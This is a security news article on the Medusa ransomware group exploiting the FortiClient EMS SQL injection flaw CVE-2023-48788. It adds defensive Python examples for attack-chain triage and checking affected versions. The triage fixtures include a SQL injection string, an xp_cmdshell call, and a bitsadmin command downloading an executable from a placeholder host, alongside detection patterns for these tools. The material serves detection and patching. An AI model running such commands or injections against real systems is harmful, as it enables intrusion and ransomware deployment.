Cyber Security News

Medusa Ransomware Exploiting Fortinet Flaw For Sophisticated Attacks

The notorious Medusa ransomware group has been exploiting a critical vulnerability in Fortinet’s FortiClient EMS software to launch sophisticated ransomware attacks.

The SQL injection flaw, tracked as CVE-2023-48788, allows attackers to execute malicious code on vulnerable systems and gain a foothold for deploying ransomware.

“Medusa gains access to a target system through a known weakness such as the Fortinet EMS SQL injection vulnerability. CVE-2023-48788 impacts environments that have FortiClient EMS, versions 7.2 to 7.2.2 and 7.0.1 to 7.0.10, installed to manage endpoints,” Bitdefender said.


Medusa, known for targeting a wide range of sectors, including healthcare, manufacturing, and education, has been quick to capitalize on the Fortinet vulnerability.

Medusa Ransomware Attack

By sending web requests whose FCTUID request header carries injected SQL statements, the group reaches the backend database and executes arbitrary operating-system commands through the xp_cmdshell extended stored procedure in Microsoft SQL Server.

Once initial access is gained, Medusa creates a webshell on the compromised server to facilitate data exfiltration and payload delivery. Bitdefender said the group employs tools like bitsadmin to transfer malicious files and establish persistence on victim systems.

Medusa’s attack chain showcases the group’s advanced capabilities, particularly in the areas of execution and defense evasion. After gaining a foothold, Medusa leverages PowerShell scripts to run commands, exfiltrate data, and execute its ransomware payload. The group’s malware, known as gaze.exe, kills various services and loads files referencing Tor links for data exfiltration.

To evade detection, Medusa installs compromised versions of legitimate remote monitoring and management (RMM) tools like ConnectWise and AnyDesk. These tampered RMM tools often go unnoticed due to their trusted status within the victim’s environment.
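The attack chain described above leaves a distinct trail at each stage: a tampered FCTUID header at the web tier, xp_cmdshell in the SQL Server audit log, a shell spawned by the database process, bitsadmin transfers and the gaze.exe payload on the endpoint. The script below is an added example, not code from the article or from Bitdefender, that runs simple checks over a handful of constructed events in the order the chain unfolds. The event field names, the assumption that a legitimate FCTUID value is a plain alphanumeric token, and the process names beyond those named in the article are all assumptions made for the example.

```python
import re
from typing import Callable, Dict, List, Optional

# Constructed sample events, not real telemetry. Field names are assumptions.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"type": "http", "src": "203.0.113.10", "fctuid": "A1B2C3D4E5F60718"},
    {"type": "http", "src": "203.0.113.77", "fctuid": "A1B2' OR 1=1--"},
    {"type": "mssql", "statement": "SELECT name FROM endpoints WHERE uid = @uid"},
    {"type": "mssql", "statement": "EXEC master..xp_cmdshell @cmd"},
    {"type": "process", "parent": "sqlservr.exe", "image": "cmd.exe"},
    {"type": "process", "parent": "cmd.exe", "image": "bitsadmin.exe",
     "cmdline": "bitsadmin /transfer j /download http://PLACEHOLDER/p.exe C:\\Users\\Public\\p.exe"},
    {"type": "process", "parent": "services.exe", "image": "svchost.exe"},
    {"type": "process", "parent": "cmd.exe", "image": "gaze.exe"},
]

# Assumption: a legitimate FCTUID header is a plain alphanumeric token, so
# quotes, semicolons, comment markers or whitespace indicate tampering.
FCTUID_OK = re.compile(r"^[A-Za-z0-9]{8,64}$")

# The extended stored procedure the article names as the command-execution path.
XP_CMDSHELL = re.compile(r"xp_cmdshell", re.IGNORECASE)

# bitsadmin.exe and gaze.exe come from the article; anydesk.exe is an assumed
# binary name for the RMM tool it mentions.
WATCHED_IMAGES = {"bitsadmin.exe", "gaze.exe", "anydesk.exe"}

# Shells that should never be children of the SQL Server service process.
SHELLS = {"cmd.exe", "powershell.exe"}


def check_http(ev: Dict[str, str]) -> Optional[str]:
    """Flag requests whose FCTUID header does not look like a normal token."""
    if not FCTUID_OK.match(ev.get("fctuid", "")):
        return f"malformed FCTUID header from {ev.get('src', '?')}"
    return None


def check_mssql(ev: Dict[str, str]) -> Optional[str]:
    """Flag any audited statement that reaches xp_cmdshell."""
    if XP_CMDSHELL.search(ev.get("statement", "")):
        return "xp_cmdshell invoked"
    return None


def check_process(ev: Dict[str, str]) -> Optional[str]:
    """Flag SQL Server spawning a shell and the tools named in the article."""
    image = ev.get("image", "").lower()
    parent = ev.get("parent", "").lower()
    if parent == "sqlservr.exe" and image in SHELLS:
        return f"sqlservr.exe spawned {image}"
    if image in WATCHED_IMAGES:
        return f"watched process {image} started by {parent or '?'}"
    return None


CHECKS: Dict[str, Callable[[Dict[str, str]], Optional[str]]] = {
    "http": check_http,
    "mssql": check_mssql,
    "process": check_process,
}


def triage(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run the check matching each event type and collect the findings in order."""
    findings: List[Dict[str, str]] = []
    for ev in events:
        check = CHECKS.get(ev.get("type", ""))
        reason = check(ev) if check else None
        if reason:
            findings.append({"type": ev["type"], "reason": reason})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(f"[{finding['type']}] {finding['reason']}")
```

Each check is deliberately narrow: the HTTP check is an allow-list on the header format rather than a deny-list of SQL keywords, so it does not need to anticipate the attacker's syntax, and the process check keys on the parent-child relationship (the database service spawning a shell) that xp_cmdshell necessarily produces, which holds regardless of what command is run.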

Organizations can adopt a multi-layered approach to defend against Medusa’s ransomware attacks. Implementing robust patch management practices is crucial to promptly address vulnerabilities like the Fortinet flaw.

Network segmentation, regular backups, and employee security awareness training are also essential components of a comprehensive defense strategy.
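Patch management for this flaw starts with knowing which FortiClient EMS installations fall inside the affected ranges Bitdefender quoted (7.2 to 7.2.2 and 7.0.1 to 7.0.10). The following is an added example, not code from the article, that compares inventory version strings against those ranges. It assumes both bounds are inclusive, that "7.2" means 7.2.0, and that anything outside the quoted ranges is merely "not in a quoted range" rather than confirmed fixed; the inventory entries are constructed.

```python
from typing import Dict, List, Optional, Tuple

Version = Tuple[int, int, int]

# Affected ranges as quoted above; assumption: inclusive bounds, "7.2" == 7.2.0.
AFFECTED_RANGES: List[Tuple[Version, Version]] = [
    ((7, 2, 0), (7, 2, 2)),
    ((7, 0, 1), (7, 0, 10)),
]


def parse_version(text: str) -> Version:
    """Turn '7.2' or '7.0.10' into a three-part integer tuple.

    Integer tuples compare correctly (7.0.10 > 7.0.9), whereas comparing the
    raw strings would not.
    """
    parts = text.strip().split(".")
    if not 1 <= len(parts) <= 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unparseable version: {text!r}")
    nums = [int(p) for p in parts] + [0] * (3 - len(parts))
    return nums[0], nums[1], nums[2]


def fmt(v: Version) -> str:
    return ".".join(str(n) for n in v)


def affected_range(version: str) -> Optional[str]:
    """Return the quoted range that contains the version, or None."""
    v = parse_version(version)
    for lo, hi in AFFECTED_RANGES:
        if lo <= v <= hi:
            return f"{fmt(lo)}-{fmt(hi)}"
    return None


def triage_inventory(inventory: Dict[str, str]) -> Dict[str, str]:
    """Map each host to 'affected (<range>)', 'not in a quoted range' or 'unparseable'."""
    result: Dict[str, str] = {}
    for host, version in inventory.items():
        try:
            rng = affected_range(version)
        except ValueError:
            result[host] = "unparseable"
            continue
        result[host] = f"affected ({rng})" if rng else "not in a quoted range"
    return result


# Constructed inventory for the example.
SAMPLE_INVENTORY = {
    "ems-01": "7.2.1",
    "ems-02": "7.2",
    "ems-03": "7.0.10",
    "ems-04": "7.0.0",
    "ems-05": "7.0.11",
    "ems-06": "unknown",
}

if __name__ == "__main__":
    for host, verdict in triage_inventory(SAMPLE_INVENTORY).items():
        print(f"{host}: {verdict}")
```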

As Medusa continues to evolve and refine its techniques, it is imperative for businesses to remain vigilant and proactive in their cybersecurity efforts.


Guru Baran

Gurubaran is the Co-Founder and Editor-in-Chief of CyberSecurityNews.com, specializing in vulnerability analysis, malware research, ransomware, and computer forensics.
